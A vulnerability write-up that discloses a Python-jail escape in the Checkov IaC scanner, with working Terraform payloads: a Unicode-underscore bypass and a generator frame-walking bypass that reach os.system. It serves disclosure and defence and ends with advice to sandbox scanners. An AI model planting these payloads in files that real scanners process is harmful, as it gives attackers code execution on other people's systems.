CVE-2025-2180 - Breaking out of a Python Jail in a Popular IaC Scanning Tool
· 11 min read
The Quick Summary #
- This blog post describes a vulnerability in the infrastructure-as-code scanning tool, Checkov that allows for arbitrary code execution if run on untrusted Terraform files.
- The vulnerability involves escaping from a Python sandbox and evading a check that blocks double-underscore attributes. We’ll walk through two bypasses: one involving Unicode characters, and one using a generator trick that digs deep into Python internals.
- I was able to use this vulnerability to gain RCE on a SaaS code-scanning product. This CVE serves as a reminder that third-party code scanning or linting tools should be used with caution, and ideally executed within a sandbox.
Background - An Earlier CVE in Checkov #
Back in 2021, I was playing around with the IaC scanning tool Checkov.While browsing through the source code, I stumbled across a few interesting lines of code.
def _try_evaluate(input_str):
try:
return eval(input_str, {"__builtins__": None}, SAFE_EVAL_DICT) # nosec
except Exception:
...
Show this to any security nerd who’s familiar with Python, and they’ll immediately recognize it: this is a classic example of an unsafe Python jail. I’m not entirely sure where the idea originated, but this specific invocation of eval is often considered a “safe” way to execute arbitrary user-supplied Python code. The idea is that if you remove the builtins (second argument to eval) and locals (third argument), the code passed into eval won’t have access to anything interesting and therefore can’t do anything dangerous.
This is, of course, not the case. Python allows a lot of introspection, and this jail leaves plenty of room for escape. The typical approach is to recover the builtins, which can usually be achieved by chaining together a series of dunder attributes. You start with {}.__class__.__bases__, then poke around until you are able to find the builtins and grab __import__. From there, you import os, then execute shell commands via os.system. Using list comprehensions, this can all be done within a single expression. A full Python jail escape looks something like this 1:
[x for x in {}.__class__.__bases__[0].__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('whoami')
In the case of Checkov, this code was being used to evaluate Terraform arguments. The vulnerability could be exploited by supplying Checkov with a malicious Terraform file, such as the one below. Running Checkov on this file will cause sleep 10to run on the host system:
resource "random_pet" "server" {
keepers = {
ami_id = "[x for x in {}.__class__.__bases__[0].__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('sleep 10')"
}
}
I sent this POC to the Checkov maintainers through their responsible disclosure program.
An Incomplete Fix #
After assigning CVE-2021-3040 to this issue, the Checkov maintainers decided to fix this vulnerability by blocking any input string that contained a double underscore, theoretically blocking the ability to access the attributes necessary for the exploit.
def evaluate(input_str):
if "__" in input_str:
logging.warning(f"got a substring with double underscore, which is not allowed. origin string: {input_str}")
return input_str
return eval(input_str, {"__builtins__": None}, SAFE_EVAL_DICT) # nosec
This fix didn’t sit well with me—it seemed plausible that there was a way to execute arbitrary code without using a double underscore. I didn’t have a POC, nor the time to research the problem further, so I decided to move on. Years later, this project caught my attention again, and I noticed that the eval code had not changed. I decided to spend some time looking for a bypass to the underscore check. After a bit of research and experimentation, I was able to produce two separate bypasses.
Bypass One: Unicode Underscores #
The first solution is a neat little party trick. Python allows the use of non-ASCII characters in code, but applies a process called NFKC normalization to translate these characters into their canonical ASCII representation when they’re processed by the interpreter. There are a handful of non-ASCII “underscores” that are normalized by this process and can be used as drop-in replacements for an underscore in most places in Python code. One example is the full-width low line. Crucially, these characters are normalized by the Python interpreter if they appear within code, but remain untouched if they appear in strings. For example:
>> # Example character that will normalize to an underscore
>>> chr(0xFE4D)
'﹍'
>>> underscore_example_variable = 123
>>> underscore﹍example﹍variable
123
>>> '_' in 'no﹍underscores﹍here'
False
This property allows us to bypass the __ in input_str check: these characters will be normalized after the check, when the eval executes. We can reuse the previous exploit, swapping in a unicode character in place of the underscores:
resource "random_pet" "server" {
keepers = {
ami_id = "[x for x in {}._﹎class_﹎._﹎bases_﹎[0]._﹎subclasses_﹎() if x._﹎name_﹎ == 'catch_warnings'][0]()._module._﹎builtins_﹎['_'+'_import_'+'_']('os').system('date >> /tmp/unicode-example')"
}
}
Running Checkov against this file again gives us arbitrary code execution. Wow, that was quite easy 🎉
Bypass Two: Walking Up the Call Stack #
The Unicode bypass felt a bit unsatisfying. I anticipated that the maintainers might fix this issue by simply normalizing Unicode characters, so I decided to see if I could come up with a better exploit. Is there a clever way to sneak around the dunder check assuming no special Unicode characters are allowed?
As it turns out, yes. Here’s a sneak peek of the full exploit, then let’s talk about how it works:
resource "random_pet" "server" {
keepers = {
ami_id = "(lambda gen: (gen:=(gen.gi_frame.f_back.f_back.f_globals for _ in [1])))(None).send(None).get('_'+ '_builtins_' +'_')['_'+'_import_'+'_']('os').system('whoami')"
}
}
Note
Heads up: this is going to get into some nitty-gritty details about Python internals. If you’d prefer to skip this part, click here to jump to the bottom.
Starting With A Generator #
The execution environment in eval is very limited: no builtins, no imports, no getattr, and only a handful of available functions. We do still have access to Python’s built-in types, which includes generators.
Generators are a lazily evaluated way of returning a sequence of items—if you’ve ever seen the yield keyword in Python code, you’re familiar. Python also provides syntactic sugar for creating generators: generator expressions. The syntax is (x for x in [1,2,3]), which is conveniently allowed within the restricted eval environment:
eval('(x for x in (1,2,3))', {'__builtins__': None}, {})
<generator object <genexpr> at 0x104f007c0>
Why is this useful? Generators have a special gi_frame attribute that will be very useful (note the lack of a double underscore), but to explain that, we need to take a quick tangent into Python internals to learn about frames.
Frames #
Every function call in Python creates a new frame object that is pushed onto the interpreter’s call stack. A frame holds a reference to the function’s compiled bytecode (f_code), the current instruction index (f_lasti), the function’s global and local namespaces, and several other execution details. Frames are linked together through the f_back attribute, which points to the caller’s frame, forming a linked list that mirrors the call stack.
Generators use a frame object to hold execution state, accessible via the gi_frame attribute. The frame is created when the generator is first advanced. After each yield, the frame’s state is suspended, allowing it to be resumed on the next iteration. A generator’s frame contains an f_back reference, which points to the caller’s frame.
A Path To an Exploit #
Putting all these pieces together, we should be able to use a generator to escape our Python jail and recover the builtins. A generator expression lets us create a generator object, from which we can access its frame via gi_frame. This frame’s globals and builtins are empty because it was created from within the eval context, but we can use its f_back attribute to walk upward on the call stack until we reach a frame that has a reference to the builtins.

The exploit code would essentially be:
(i for i in [1,2,3]) # Generator Expression
.gi_frame.f_back.f_back # Access frame, walk up two frames
.get('__builtins__') # Grab builtins
['__import__'](os).system('') # Grab import, run code.
If only it were so simple! There is one detail that makes this exploit quite a bit more complicated…
A Missing f_back
#
If you try to run the code above, you’ll notice the problem. The generator’s gi_frame has an empty f_back pointer, which means no walking up the call stack, and no access to the builtins. This is the case for all generators - the f_back pointer is cleared after each iteration. You can see this happening in the Python source code 2
result = _PyEval_EvalFrame(tstate, f, exc);
tstate->exc_info = gen->gi_exc_state.previous_item;
gen->gi_exc_state.previous_item = NULL;
/* Don't keep the reference to f_back any longer than necessary. It
* may keep a chain of frames alive or it could create a reference
* cycle. */
assert(f->f_back == tstate->frame);
Py_CLEAR(f->f_back);
Examining the Python source code reveals an opportunity, though. The f_back pointer is populated during each iteration of the generator (the call to _PyEval_EvalFrame), but cleared afterward. If we’re able to get inside the generator and grab the f_back pointer before the generator yields, it should let us access the caller frame. How can we achieve that? We’ll need some serious Python trickery for this.
A Generator With A Pointer To Itself #
OK, here’s the plan: we’re going to make a generator that yields its own gi_frame.f_back so that we can grab the reference before it is cleared. This involves defining a generator that references a variable in the local scope then assigning that variable to an instance of the generator, creating a circular reference where the generator has a pointer to itself. Here’s what that looks like in long-form Python:
gen = None # Variable that will hold the generator
def generator():
# Before we yield, f_back is populated
yield gen.gi_frame.f_back
gen = generator() # Create the generator, assign it to gen
f_back = gen.send(None) # Start the generator
This gives us access to a frame containing __builtins__. Now the challenge is doing that from within eval. We are limited to a single expression and can’t define functions or assign variables. Thankfully, Python is a very expressive language, and you can pack a lot of madness into a single line.
Packing it All Into One Expression #
Although eval does not allow assignment, we can sneak around that limitation using the walrus operator (:=). This allows us to create our generator and assign to a variable in one expression. Lastly, a call to send() starts the generator and gives us access to the frame we need:
>>> (gen:=(gen.gi_frame.f_back for _ in [1])).send(None)
<frame at 0x1045f4f60, file '<stdin>-3', line 1, code <module>>
This is very close, but there is one additional step. The expression above works in a Python REPL, but it doesn’t work within eval—the gen variable wont resolve. This is because of a subtlety in how free variables are resolved within eval, explained here.
To get around this limitation, we need to create a closure that contains the gen variable. There are multiple ways to accomplish this, but I found that wrapping the entire expression in a lambda is the most elegant and readable.
Here is our final exploit:
(lambda gen: (gen:=(gen.gi_frame.f_back.f_back.f_globals for _ in [1])))(None).send(None).get('_'+ '_builtins_' +'_')['_'+'_import_'+'_']('os').system('whoami')
There’s a lot going on in that single line of Python. Here’s a breakdown that shows the exploit step by step.
Impact #
This vulnerability allows for arbitrary code execution if Checkov is run on an untrusted file. Code scanning tools like Checkov are often thought to be safe, and are used without much consideration to the security risk they may pose. This vulnerability is a good reminder that third party scanning tools should be executed with a bit of caution, ideally within some kind of sandbox or limited execution environment.
This vulnerability is especially concerning for any SaaS products that rely on Checkov under the hood. A few weeks after the fix was released, I found a code scanning product that was running a vulnerable version of Checkov. By creating a pull request against a private repository, then scanning my pull request with their tool, I was able to execute arbitrary code on their infrastructure. I responsibly disclosed this issue and it was fixed within hours.
The Fix: A Safer Way to Evaluate Python? #
The Checkov maintainers fixed this issue by removing the eval statement and replacing it with lmfit/asteval, a “safe(ish) evaluator of Python expressions and statements.” This library implements a more minimal Python interpreter by parsing the expression with ast.parse, then using custom logic to evaluate the abstract syntax tree while blocking potentially dangerous attribute access and function calls.
I wouldn’t bet on asteval being completely bulletproof. Sandboxing Python is notoriously difficult—although asteval’s strategy is a much smarter approach, it still feels like betting against the house.
While writing this blog post, I reviewed recent CTF challenges involving Python jails as a way to catch up on the state of the art. I was thoroughly impressed by the arsenal of tricks CTF players have developed for attacking Python jails. Suffice it to say, I wouldn’t trust any sort of Python-based eval sandboxing. If you find yourself in a position where you need to eval or exec user input, it’s probably best to wrap the whole thing in an OS-level sandbox.
Also, while doing this CTF literature review, I discovered that this generator trick is not new. Some folks in the CTF community seem to have known about it for a while. In fact, it appeared as a challenge in Samsung CTF 2023, with four solves. Unsurprisingly, CTF players beat me to the punch on this jail escape. Regardless, it was a very fun little puzzle to solve 🙂.
That’s all—thanks for reading!
Depending on where the
evalstatement occurs,__builtins__might be either a dictionary or a module object, which changes the exploit slightly. In the case of a module, it’s often necessary to recover__builtins__.getattrfirst, then use that to access__import__. ↩︎This code snippet is from Python 3.10. The code in later Python versions is more convoluted, but the behavior remains the same. ↩︎